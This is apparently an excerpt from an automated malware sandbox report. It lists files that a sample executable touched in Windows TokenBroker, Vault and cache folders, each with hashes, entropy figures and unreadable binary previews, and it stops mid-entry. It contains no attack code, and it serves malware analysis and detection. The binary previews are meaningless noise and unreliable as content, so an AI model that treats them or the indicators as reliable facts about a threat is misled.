                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.9137666991336495
                  Encrypted:false
                  SSDEEP:48:Y5SiyW/7c0DN+Jlj694IHorv7VCwMHhXJtHa8xrf1KYk3nD:oaW/Qpvj69qhMlz68NMB
                  MD5:7C719EF7422DCD8ED075CA12E1377814
                  SHA1:40BD079B2827839B179F434F77658B50F5754160
                  SHA-256:8B7ED8CC0430C388C9E4B3B2A3308A1DE200BFEE28CB579426A066283597FE20
                  SHA-512:4F55693278EFB4D6ED6B9BAB6EA5317D08AEBA89B011D91547CE503A53199E8E6B5364B5AF6F51A4EE8BD3D46E6344BB948DF3A21FA1CA393DFE247427A01ABB
                  Malicious:false
                  Preview:{.".T..jO.!......_w..c...?T.|*l.D..=.:....-.?.C..A.,.A.-L.W.?....Q......`2....-j.u..q....*...^[..A..ZH-....|04chx.....C...W...n.5i..+t..LWVC.wb.P#.m......C5.&V..cU]..*I.n1&.i,e...N>.6d.......U..Q.d..7.D..k<gf_Th.]..`.@`.z0.9.G[...?0.H%.4F...~...Dt..`O.j.O.|...W..G-....p....6...U)Y?..F.W.:Jt...~@..[l..qU...c....:Y?..e.TKh..".MZ.C..=3.(.ko7.=.[....>.C..;.4..(:3eZ,........R..0.z..ZOV.......nA=..8..V..g.T...h.....*C.'..?..D-..33@u.W=h..;.d.Wh.6..X.ZC"L..T.....E.....yY.[..,....D.4.s....N.&.P~......_..8.....q.X.'...".?V|..#....B).+..zq.&...Q...0.....~...D.-;....9.&\...{......U..:.1.../.Q1.....$sUzO.Xw..]..^....o|J..P...SP.za...l.W.....iB....|.54?..A.;.....(qJ@. ...ux.....5.e...1.Y.....BQ.n..\.05...BI....r{.M!....!. ..c.w..ao....r.GpZ......p4.8.`.|.dx~~pJ-...h,.E98W..v.....3[..Op1E].[5...(.....yie....+.t .5...+..0.*.x..m'c...+...g..Y...G.....[4...C.Q.A.C5{......#.3...x.#..m..x....OR.....t.>...UY......_.#.Om.a..4.|..j-....

                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\1521f696d8626c8e8127c0284ab987ff1974f39a.tbres

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.928433252034019
                  Encrypted:false
                  SSDEEP:48:AfQVptrrAvrxKEE2haAD6Pefvv2NQfp8aiRwxf1W1gkYOfD+gE8WrZv5W3nD:40pFMvNhOAuPef2NpaYwN1W20rWrZm
                  MD5:CA97ACB771A726CC9D2DA84A5FF4BAC3
                  SHA1:A4D7A489047208675329E150332A1E1D4C38E0B1
                  SHA-256:2634F27EB04391AA8A3348569BE25E1EFC67AC7DB98A9A6EA8607C153E40A224
                  SHA-512:85E4F540DB1003F60DE94B0DA97DD41C70C02B402D65A27CAD7BF33E3513737C1F1C75E0FB4CC2688897B8E02CDFD0341F692B21148ED21122F7B060245E81A0
                  Malicious:false
                  Preview:{.".T..g.O..n@.F.vo.0.Lb.".P..q...:..M...3...,:Ia..Z&.K4O...j..Em..Fj#.......&n..4......\uI}.z....S....]...-...@.a.{.*c... .[..&.m...Bv.d.....PT....:.dbx..X.Y.#xO.l.X..._.;.....-.|k..~..9.A.KUt8.XH6.=._>{...5.}....5h....{..S.....Z... ...KXj.....:uh.X<...Z.C.J3..T.,.\.O...})...).l.&.6..y...^...=....>(...&[.V'.,..-= ..61sK$.......@.u.w.\.C7..|5.0..Q...}j.w?..{{Y...O.|...P".Z:2.o..yJ...i...............-C?..7.M5#.....0.c.p..S..f.M.0.:.?.......T...Fq..'..V...V/I..E].W._9&ZQ...T.@qJ.0..i..@B..6....u@.D...w..tX.I...>.w...=.Z......N....:.$...Q....>Y...].l<|.-......|...K..U...ee.Z....,9...P.C..9.....Y.t...J.BG;I.5....O..@..j..."..K..|(...B3w.<F...,..v...y.yk{k.....J....e. -.V....v.6.IVj..ac.{..8.(.....G.P.[.===ZB. .RQ,..?.C.[8...z..Ez"Q.v..WyjC.O.cr.[.......X*7.1.D...t....C+.-.V....A0........I,.0G.^..r.(...x..fc*1>..!.$f..xog0).:..v...T..74..\%.....O..<t.+...q9sc.}y...X...5-...Y`.#....c..S.c.$.@...l;....<J...hE. ...h1.z...I....G.[.K

                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3018
                  Entropy (8bit):7.928518027851215
                  Encrypted:false
                  SSDEEP:48:EZHJ/ecvxeQIFsJssRvpg7NOXDIU+VzhanesFHwYD430okAVfln3C2wbeqtUoeNb:EhJ/fvoLsyQxgxOXEU+Vzhahn4xln3nF
                  MD5:954C211D2C6DE5BC17B686AB4059EADA
                  SHA1:516C9FC2CDFF335490DEA6ADA575C7E1EA792EF0
                  SHA-256:AF1AED6CA01D875BB8D157BEF0C48D12261188620B2C5FBCFEFC7617F75F5734
                  SHA-512:96DEEB71BEB040502D82EB5218D8ECF2F3476E26AF11A05EF79A4006E217BDC06D9C4D26B88F780D950469797CE03B5BC930BA98B4C4CE80923FF8BE30E76718
                  Malicious:false
                  Preview:{.".T...r..U.kH..^.D_.c......3h../...r.iDw4...$.N.-dG:2...lkAlH..k.p..........=_.......:..sPrfV.....~x..@....a..DL...P.I.>....th.dh79...K~.m...k....aMhq.Lu6q?..]\......y6..U..|....8.o%p..h..I.5=iLe.,.b>9.8..S......g..vY...wM.z.~..Ca...q..c.j.Q.qg$.W.....?{..C.a..p.nkDP....,;.(..g...s.....@}.V...q.^..FgAlEm=....^6...{....;]oAMq..q.0j(.p....'..`..M[?..?O.#....}........-..mV.t.D}.m..H.......KU....4.....L.@M^P.....C....,Z....#....nM....T..5..=x.kKM...%H...X....%-+.#./+ft....5..PxL.L.R....]. i.}]].....?(X......6......g.,.j.j....E]a.7..^l=..E.A...3.f...Uo...(...1[r.D.7|d<.#.@.']H..u.o..@%$...~.t...M..Ud.......~C4.TyEF*m\.AG.qP.../UF...j.~.)Y....l3...8._>I...O;.t.v...n......6}|.........F...s.e.l!..A.\a]8....)...."}.R.^..g.W..X.Q^7.L..Z.n.h.....-.O3,./....>........y..........k......;._..z.ND....e#<..............?.k=.}..:.....c.M..k=._.1.t.....{.....?.....Q....6l......8;3+.cV.....^.Z.c.Mr.G.X.&Wq]b...=.N.V..e.Tl../5.(v.....a..^...0GK..4

                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.922200408884493
                  Encrypted:false
                  SSDEEP:48:IN+t8qKDaTgSrKbAsC52ftFANxjanKZyjjs+I8i2HW5Y9b+bzXeq+tYZh3nD:IyJJ0zsCFG+KwvHWbbGyr
                  MD5:30F12D22EBE0B64772350437647AF07A
                  SHA1:6A9F5D952A1AD08AAF4D440D2CD143E10F074B7A
                  SHA-256:68B9CDF338B095C6AEF4A6F0E369A1E24A25535D3BFED9F84D9682132B44D427
                  SHA-512:F620F3D8E469CC3174A5C56CFF9B226F5F22941CE76B8A05780E92C4D037DD43A318BFC1D987A889241DB61EABF4DDCFF3608E176C70114F0A2F3C22E377D677
                  Malicious:false
                  Preview:{.".T.fx:}.>.[... v.{...Gg..-Y.....%...p.>b<..I...~.4.k....5... :.T.8.`9...9E.'^.........qv.gI..y...B...........Y...K.-.<h.]9.&a.K0Ay...1.IM...f..Ur.L.".Q_.K~ms,..%..].`.......J....&!x."....q2.....J".P7.d.M..y.d...$.~.&.d....._...fL..K....Z..Jf..y..Fi..X.>.....6..i.e...7RX../.rr...Z.p.:......G.4.1.VI..T.!.... .....O6.'.I. ..ia.].6.........k..X.#n...B...@.m.u..y.W....i...'D..........z.R..Q...I.=.>.vy...O..*.....-..K.>........k....xF.].7..!...9..74.H.M.....Z|\..C...."....O....9.6p.4.U+.......}.....]....E..xq...7...]..6..+5.J.....}.....Afw....V.cK.Bf."..U.3!.o...D5ft:+|fn.JX...q.&.2C1X.../.L.............|...An.&.W..A.|.AY....)/...mO:.3.."...{.)C.\H...%...s..p_..X.../.I#...a.#!..~@.&tz...[.rk....A..!...|.|@.i1.p@Q..... ...._H.....X...;..U,...L....j4_T}.1E.CP....7.j..^>..x...iXZ ...'&c7e...&.SCs..qG.p.-..6.7.l#...o.vm...oE8...V.....Jl..'k\I.'.0."m...hp..5.Vu...imnI,..dD....3U......`....Th..e....:F.rB...o._.,m.Cq.:A...#..v.U.f..k^T.L.*T

                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4956
                  Entropy (8bit):7.960165446910073
                  Encrypted:false
                  SSDEEP:96:AOGgUIBLUAzqSikR5TUIbTB2YFv/qm90phwEeqf+dlb+O:AAdUAzfiCF4YFv/qY0pGNqW+O
                  MD5:796B9AAAA57FEAF9579140D7F33CAC47
                  SHA1:E50477F3823B3E222B825611A700CD58185B1F3F
                  SHA-256:7D5D482FA28BDB5F42F1674D248222FCBF1D9B8B36AC3F99D6772112D33A131F
                  SHA-512:1FAF63C9684AFC88C6EDC9B1EFF29ADA65F51A49981EA258CC00D53D74293B021486817162F7FDE6C7CE859AA7F58A5EC91D50C7A1A2BFD0F0FC568589AA1978
                  Malicious:false
                  Preview:{.".T.......G.(.._.}..B............c..G..7rE\.6*.."&.Uk/...:.`..s2DH..u$.u..>..5....%..S.#...I....I.m.F...x.....z._..k..'o...E..`...i.A_.5jy.#1i......y[...jv...G.r.aE.7wJ9. ...~C..M...c6....S..7Z......>VY.....(!..O.x.........".o<.6..H....q.^R.F|..S.x.O.k..w.".A..O...7.M.../?.Q.&.=....m/.7Km...B..^.6..1#>.uy...6R..,..D.]@.j0o*......=.?R....T.>.Q.Z4..![....R......r`|8...R.*.......j....z....#F..^..t.t.0+}.l..1....|..CY.b..~.....Y.m....\C....Jf.*..L..._....w...CA..y..M..0.md.a..A.@_..|"......D.......C.L$.n...X......h...+}.Z..}.kx.1ZQ.@t.......4^....[Y....a.;.>n...TozF.t...9....*%Xn.4.(?...*...q.$...R7.v..:H.<.sA.i..W.C.L.` HT.....)-b:.... .h.?...`.r..koG.,...w.T..2..a5D.V...2.{...Z...?.H..A..IQE.D..iR..AdQ.X..".t...z......J@.k(...7UC....a../..-T...I...G.h..Ymv..O.a]..../.!.).}..'o.....u.L...#:w\.N4.V..i.G.B.f<...u.;.....a..>...3!.".....).z+.......:...H.1..H.B......|!U...N.'N.c..x'...^.ir.Ub.u..A....C.D..7.9..A...=..1^(..........3$].b.S..

                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3018
                  Entropy (8bit):7.93298023113247
                  Encrypted:false
                  SSDEEP:48:hx6QNdI7c1CKV/7KyU1X8atlrO5SraOR0FX/AZXd10jspLxFtDmJNvfaCTe8w41S:h9H1CcvUB8C45lPGdAYLTtaJV6w1qN0e
                  MD5:82973C684518BEA749935E8B008110D1
                  SHA1:5573595CEE6FC773F76A5DD7D7BACC26812FF958
                  SHA-256:4D24EF81F149FBA450F030F9E836CC645AEE60731CA48B2C71DF58B30A139822
                  SHA-512:17B2E2C161F7D7CEAC9B74356E042CDD458E23B686F6C86E3FBA99F768241E064DC877CCDAF42D4890758B94EDD854C14BCAEE8FEE467CC20743D7DDF4671463
                  Malicious:false
                  Preview:{.".TD.db[9....z.....].A.l....E7..T.1.WE...%..U......G.....hHM@.dN..7.2P|;.DV...Xn.`..Jj.2*....>qG0.Y..'tb..F]...*FC.*.!..W..........j.4X.A1u..P..(.c....8..G.yk..r..y.r....gcI.....L...`....P..Q.'.y<......rUH<.7......;pa..o...^..."<..0.W7*I"..vq.........(......K.e....eW.z.B.". ..^l%l.o..x.Rp=.*y..a..d..@..p0. .7.`o...RJ/z.AD..U.G.^..L.k.q.Eu..|..4%.......-.~B3......Hg..,..s .:.^.b.....[...._..u...7..Tt..I.."b~B....8....HV...?.=...*j;......`.%C..\1.e.|.QD..mL0~n|..JoS......4M......+H..z.S.....y<........R..9.'..-.Wk.t..\y.!..q......5.....#~.}g4.[.....aF.......8......W..G..$...-.7A.....=.X.oB...z.T...}.u.)B...&:q..8L..+..Uf.......7..\...N.AG".K.1R...s..q%..n.h.{.....n.59..A.+|w..f. ....=.... .*!X%......=....p..rb.`.h*3...K.5...D...+>+.(.)..bX.ty8.HZ....p......./62.....BP[h...)...;{...A.A... .5[.....n.d.6..k.7=..)...Z.l8`.Y(uY.)...~.3....X........d.hh..-......K6....>........&..f....6%?.t....s...6M......U....+......4....h.....mr.9$..N..n.g>.

                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\f036564d8b727dbe99499799c7e51936a642f62a.tbres

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2612
                  Entropy (8bit):7.931614411603075
                  Encrypted:false
                  SSDEEP:48:leLyHn1a7w2dyOLxduQruEEIWqX2sle4EIbSAFO0ReRScTMpje50Db1LY3nD:wLo8DjuQ6EUqXUkbSAqccsScs
                  MD5:3CFF1179C5DFAFC507EB94380FBB0A4D
                  SHA1:E6888908F18E6CE7020E4D8D0D01BDE9244B13E8
                  SHA-256:7054114FB50CF19270219389F06F403CA432346D616E89933144EDEE879E7B19
                  SHA-512:B742A6F263C933A0AB1FD0C68B7590A019A04F430D8F5A8D92814622E779A76D3769274BE3E1BE011E1543034736B4B913DC3AE66A8AD3BC13EEB76C353889D6
                  Malicious:false
                  Preview:{.".TNv.J....l..*{oN.X..B......jN.._..e.EqN..#{.....#j.Q...A....Z2S9...:..z..w.iE.*..........1.K"d.....bHsc....S.-....'.|..d..p....&.u..t.E...3.....R.RC._.0..7....j$......k.OyCL.1S..(.......T....q..6]H.~.S.....d:...../_.U........}.m:7r.6....d....H.~(j.Bi.2.3b.\....R.....Q.....>\z*.....$.N..>.U.-.u..?.rM.....q...9Y=x.&.E..,......X*l@...M...1),6.-..Ue.U4W".....cP.re....A]Vw......%.9.../.p......<...]..0..dN.....f.. .-t....;.:...Y8.>....=.+^%..h.%&..Z..B!.Z. .._.../.L........c..qD[[.B.:...(*!i!;s...Z.........IO...Y|.3....={.:.....7.v.$u...[5.......K4m..(3/..,E$.E\C.kT......D..j.....G]_..H.j}.F.......b.=.182.z.(.f....S2..%S.?...J>D.z..B.;.v..h....F...u...e..zUlw.k..L..<.7.....q...#.........P|....d....9J./..f....;..}0.=..<..r9.h...|...L....b.2...=..CA!........*;...C.+......6.,....].Ge./z....c.e..'..kn....q.AA<s...A.n.u.6.....xg..`.8Oh%.5.>j5...........V"/;q{GuypFk5...a..C..=...J....6.%....dy.t....L.......x }.}._...R.o.W....{6h.....

                  C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):770
                  Entropy (8bit):7.710303171800778
                  Encrypted:false
                  SSDEEP:24:JM+QqnVLMVVbX/KjePRfHBEVGnPBsh2BTU3zbD:urDvgWRfgGnPBsh2tU3nD
                  MD5:791B3C8FF9B00663D979AA2CA0289369
                  SHA1:99F58FEB8AAD860BE7869DAFB1EA76120992208A
                  SHA-256:A7A9702B092A17DA472B70DDC12105AA02BE64FC3E1E92FA7057626978FADBC5
                  SHA-512:1382C9BC817E9F8E8A6477A75617FD5B9D9AAA33C96C9B2C30AB9C95875AE21E908FC50E0B470A0CE8DBF3532F009BF3A2CDFAA1347E8F12568266044C510F5A
                  Malicious:false
                  Preview:....B..H....u.......9..D..0.L^!..w.w'P..2j.... ..yv..{..1.`.9<.{.<N..}.[....1..>^.0=..o...]..m....F..cy.6.. ..&]"......LY...D....j.{_.A.fG..p..XG.."....Z......._`..........*7C...1....v..aq...^.{.....d..%QyY.....5.+Y....c.....9`....t+.Vg...x.O.X...Y..Hu..~S-&%...F...~.D.mW........x.-&m*...&v(...._.Df.Y.PC..../~k....?...J%z\o.....Ef>...za.._.....t.n.......p.oL?.L,x...#...k..y.s......xS5..OHA..!...kAv..s.M..!...u...#.../.*GYN.Dy...lQ......A3...S....`..,.4...bQ.'..G.....^....1.(.{y..>.gn.........Oh..........~.wW.]..".a........\........Ra.=6..H.C.m.Q*.I.w........m...L...8 e.PF.~l...[.jB.".NoJ..tE..N^.2..PX."ft...d..:.l702ot\:Q.6....}...~%A..[?.&=...+i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):424152
                  Entropy (8bit):6.331431996139815
                  Encrypted:false
                  SSDEEP:6144:pCL7uwr3mv4/MDTkfkbszYXkm+vyJfbnQkK96B88yKv4bWTmTvEiLST:pW7uKmw/MDxIzbm+6dF4/M
                  MD5:5EFEF93D73E4E2A8442F419161BD0C9F
                  SHA1:FB198954E96ADBC580481678E476D3C6110E0E91
                  SHA-256:2FF781D3A277D6D30BF99E69C46351F3F5B131B48F8C143FCB4790BBCAC0EA60
                  SHA-512:BF4BD36C5AE695F107596469066E7908B111794AEC9F29EAFFFDA678354D9128FDA81AB506F84ED11A785FB574382B06EF2D32AC56EBB809B3DF4A1D20735F8A
                  Malicious:false
                  Preview:...P.[.X@?.r.,..'..Gh......&.G.a=5...@@~..x.L:m.....s-....O.(.....kQ...6(..=1,..L".hs.*I........m.m......B53[,..,3..P9.E&.N..I9.......6.o.2....R..p.*.....;a....sqm.pmo...k0...f..|.`...c...i.G..=.UlU......+y...(.B*..O.k...J.{(......I..h......e..P.cc+.......u......`4.Pj/bl.-....z........y....@<.-...a.x(.....v.h.....8d=..Q:q........-w.2&._a.K....4..EV.R..d. .^...{.v..x;W..vf.;.pD..L..d.}T."U..Q.h..xP.W .....97AM..Kg,t..8u>.m.....4I.^.........i!.;0...C...@.Y.J$...]..Vs.....e... 1>!.K..<W.!.[....T....Id...,.n.%.ym.....+...]<qN.S..u..:/_...{ ~..S8...$#.[R....q.2..N.k.J.#.....JV.H.;......H.M.....d.y..c..+.J...>Zf[4...@.6.~z......T.*....|...,V..4L........F,s .ud.8...rSZ...T...h._..o........P...W...5..S.....lW.r^......3...^......1II..:...,..-...z...q.#$Q.K..(j. W.u.R.....Jp... .....hh..]Kjk......'...wi)6*.\z..t@.V{.......\9'.k.....*..N.....j..6.^..Y...0.~U>...2.z..J<.k..T.b.x^...d.3}W`...........u..O...0..y......c?#.K.\....X..8.u..w.)c

                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.989555505893435
                  Encrypted:false
                  SSDEEP:384:OsxKy99cfrvT/ib3NYYAkaVIY7YHKB93OV+HB3DabqVdrAT:Dxf9ifr7/ibN49YH8XMT
                  MD5:00D4FC5E219B42D830E0E1EDB379AA6D
                  SHA1:DA99E15B32066B4342E40441543C8699D7A7784A
                  SHA-256:AE05C4E466B254DC072E954FCCF7EECAA89E18C08793ABB1135DA1636E98D412
                  SHA-512:D30D450836307731CC92CAEF583AC85864926335BE0EC15203AB38AC47106A9C0469EC2E10C73B1DD9E6C206E7B9C0F055DA43A0503E10EC6CD7CC1EFEB51D79
                  Malicious:false
                  Preview:.... ...y.3.....:~....8n.....6.3...1K.....=6....U...q.O.h.+8.a&....F.^......**]y-w......C:...........&....x..Gf...Z.&'#.93....s.7..p.. ag>n.=.q...5...P.5y...b5%m..S.Q.3f;......[....T....."xe...*@u.....N.pR.7.oi_s..:....[.S/..IB...s/..\....[.@Yc."..J......+tXd...c.;f._.Ov..#..wS.=.`e%.g.,N.[...t.....C...AN'..\)=.0.v..*....*.Qx8...z'.g}./.|...7s.N...1$.3...`.Ndc.y....._..j....scxf?5....l...k..las.?...C.....I1.@..L.Y.tFb\I04.n..s..T8..`...X...=.d....b....`*.....T.;W.|.n.N....Q..I....g...+X.R.@u.7,..........1.y@.c1..m.,oO.\_u....:.`..:....u*.......f.Y-\..i6B/.b'.z.*-G.D..Y.. ..d...Pc...l\H..{~.\hM.?M.fR.c...p............c...L.w......Lw./\.5.]..^..}.wW:...N.W@9Y.6*=.b...k.sl.]...k;..`Y.`c.H.O.\......B!v..kf.....#...9.+I.c....o..Qv&..O.a.*..}.O..m......<.f..T|..?.-..;.w..LO.,.]B8...p. K..QQ.r|.OAm.........N....;...F....[.z....MLkB..x>.....a.nF..."..X.G.dT.........".1.....-..H.X......]mr...E.6.....}4...:.:..N.;8..s........Q1..Cd2.C`.}.s.d.T..:

                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.98847691711469
                  Encrypted:false
                  SSDEEP:384:ySR1JXHLOMM4jo7mKsCPnLp80ox2I2yryPPcDiHc49s++QwXUEEQ7lh:dZOMML7WCPLpJoMh3cDiHcYsnQwkpQ7D
                  MD5:C66173470E4E683CEB90B9295E22862A
                  SHA1:3CBD56CE2724B13499CFFA5BF875EF30DA3F6BDC
                  SHA-256:F4138BCC16D1213F6C6BE2BB998CA6BEDE2BA75C2D0BB2DC700681C4C90EA20C
                  SHA-512:7A5EA97275A52DA3BECC6462FDDB1BDA488501E24DF1515D7F60B731942C19F38A03C098533E93298430D95EB183E2E43AA19347B8196C6BAA488FA181BC5E73
                  Malicious:false
                  Preview:....`^$...c._...D[Kd.M..O?.$../{.#E.'~#WN..i.........a.."JS.B. ...3H.).)...M..=.x.".&.^H..$....).........g%...kb.U.......x.{.;...x.XM.d.3..D....3.....!...U8:jf... .f...p[!2` F=.].V...'`*.Xp..kTS....HQ.M...80.p.T.is..w............e...s....8u5.t.D..Z~7._..{F..=.)?.E.M3....9r.p....r.h./.......N...~r.9.D....R..^...}..."[.p^M..@.8.m...).S.,v.KV1..8...%.~|..a.q.*.cAO.3'.$........T$!.....7.g.....m*B....".#D./eXO..~.{...I.... .].lL/o.....\;L.?.x..}..u..t.m.x....QGr.v+.m-..3`.....m.J2.AE7..xlz8^.WA...y.?.A.k.W..Gg.-...-..T.?Fj"..2..1.:...CN...].....$?..`...^...R....?V..d....#.R.}.N[.'...J...>.......q(....@..?.Y.Y4....H:(@.i.!...Bs-..nw.]2.+e.{...a..9..ug.KUe.....).Q.0e......3.~..V..7...!.0RN.. ..W.0..(_dI....+.@x.zb].EX4cf... .Q{!..t.b...*..ng...c}.&o'..G..+9..m!j".lD.@.....=.*.8d.......'..]....g'#.....v,.......6d..T....8.n...rjP.K7Q.P..'3t.R..T..-....Z.......9 ..f...m.t(...J.:.. :S?...Q....k.S..&.....;..j..8..E...JX...5/.....m,...b~..C.q...V..77

                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0325ABFA-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):424190
                  Entropy (8bit):6.332406522532871
                  Encrypted:false
                  SSDEEP:6144:fpsabcn+jCmGsOtkqjegumQeOFEZ2n4m+vyJfbnQkK96B88yKv4bWTmTvEiLS6:fpRcn+6sO7qgumQejZ24m+6dF4/Z
                  MD5:6E73BEB67B04CD984225E1C577D70066
                  SHA1:598D330832FBA4E2AC9A4ABEE61CDFC8025ECDCB
                  SHA-256:F45AD2DEEE6A485B7A544775722421A8D41FFFEC4BCC18C0E588E7912C88D1D3
                  SHA-512:1D1E61729B0FAD5F3BDC6D53862D7298DEC19EB6A76FA16ED80053C00868BCD20A333EAC1FFA8F7E1E19D05B36974F1066414FCB32D3CD67F99E38D827E12917
                  Malicious:false
                  Preview:.w.. y...9.k.?..iH...J..'ky.L.....~..\.kMbs%'.:.t.)..s....9...(.....cp.j..i6....r{..u.F....2..n.d.h..`......<._.....~..Q.....g.*... ..RUl..{...a..R,.y..,@.&.m5.zD`.E.....6.l|N........?...P.i..lK.qh-.....]..L.j_..V[qnG..........<..N..M.>...8v.w..2....V....}.......x}.<..R..{.0.}F.......2.....:....A.5(.1.M.8Qm_..w.6{|szx..W..;.s...oO.....G.X..uq..2.D.[....<>:..e/..[..0N.....N..k..VK.i..d*w.79.:.S.....G.L.`YQQ.z"j....r{...i=Fsx..;.......$y.[D.q...(.......Q)..(..Mh.[....:.;t.......X...b...:g.i..Ny..>....GM...vx..b..7..o.k;...-.......@ .9-U......(&....h;[.#.j..![...t..p\...h...mk....Y...l.@IY.<...P?.R'....I.......9t.\.....um1>(......q.I.@.mg....B..<......?.6.O..-ps.3.....&o..-.j...O.h..Lu.UZ..3.m..h.|PUuz.y......+._R.>8@H.?vCK...J..9g..z.8.=/.'....>}:...K.f..L2.../..t>L..H.....'..{#y..}....<o`>......tN..(....?.].{.....vS"..*.l.ar..a.)..o|.{.....JO7).k..^y...|..J......I....~....+..<.H..s.....:.g.........v.2..T.l.....1MS.S1..#H./>iKL%.Ic...

                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):102918
                  Entropy (8bit):7.998507254824974
                  Encrypted:true
                  SSDEEP:3072:kkrJBiqHlrFpitUMFL21JAI4cNBl2CIY9x/:lziqHLpmFpIBp9F
                  MD5:790FEF02BE4FA0FA8EBA65488AF537BB
                  SHA1:3FDF3DA2CD39F394B6A06581D3EBFBDED6434E95
                  SHA-256:7D8FF417DB30747F34D7E344C7350E9004ADFD7401F1FD14DE5FF1246FA683CF
                  SHA-512:F85FFAA3E2CD9C6A2BCEACDEFCCA29B893E0359F97C7A776787DAF108DC7DF35416F6490840428618E35028ECB149839CE130C4D71D3F3497C7067FE0C4DC9F8
                  Malicious:true
                  Preview:....h......L./{..k..0..9LN.v.k..!....Y......*|E~..Z.t...........}0....<..X...t..(....U2.....I.[=p[...].E..8...."..U.rC....;.zK.;`=.......A..aP...h....NG&8l.W..D....7...:D>.|..:..^$V,2.^..U.l^......:..HB.0$....t.F..~......(...@....&~D..b....gwQ......s.F.......s....W...1f...K...t.1..o.Uo...$.0......O~M...C...=......K..N...4|M,....$...>S.....R.......'.........(.].......F...=2..f!t%F..z....y..-...?...../.~...,j..@.Q.{.E.CH6e....h.!A..B.........K..S8...2.j....y.Z..../wD.Cd.v..PQ............/.b..+.l.Vz.Gec(..>f...%...E.3.J..7/..J.6..0...&....d.:?..b..')A.X....(q5.Z.%.J...@..-TJ>.!.u+Z..i.......}}D.@.....w[.TF.g.m...TN....dm..e......g...:.@...;...u.fL.r[.w...."...j.KE[.ZV.........J.)!..`.....T.@.v0...u..$I.Kt6..$..Sd..G.}......H.]D..r..`k.g..E....'...Jb'.g.!o.\..=d...C.)....'..G.......\!.....s.j....j@...I.t..$"L...E..'........|.8.j.!..-...Y.C.t..L...H..9.^...<..~.c.e C..m...Sp...K.'..Fmc...8.....k..1c....A..B/ic......Rqg..A....O..G.

                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75502
                  Entropy (8bit):7.997678560513898
                  Encrypted:true
                  SSDEEP:1536:ghMxmMFinKMfQz+CfqbVtCqJX8mm5DoG/8D7ZQMK8VGMLwjyn90T8:H+nKQQzXfqbjHm5fE08TFn+Y
                  MD5:5C73627ED9B96A854461B1EA66C3F70F
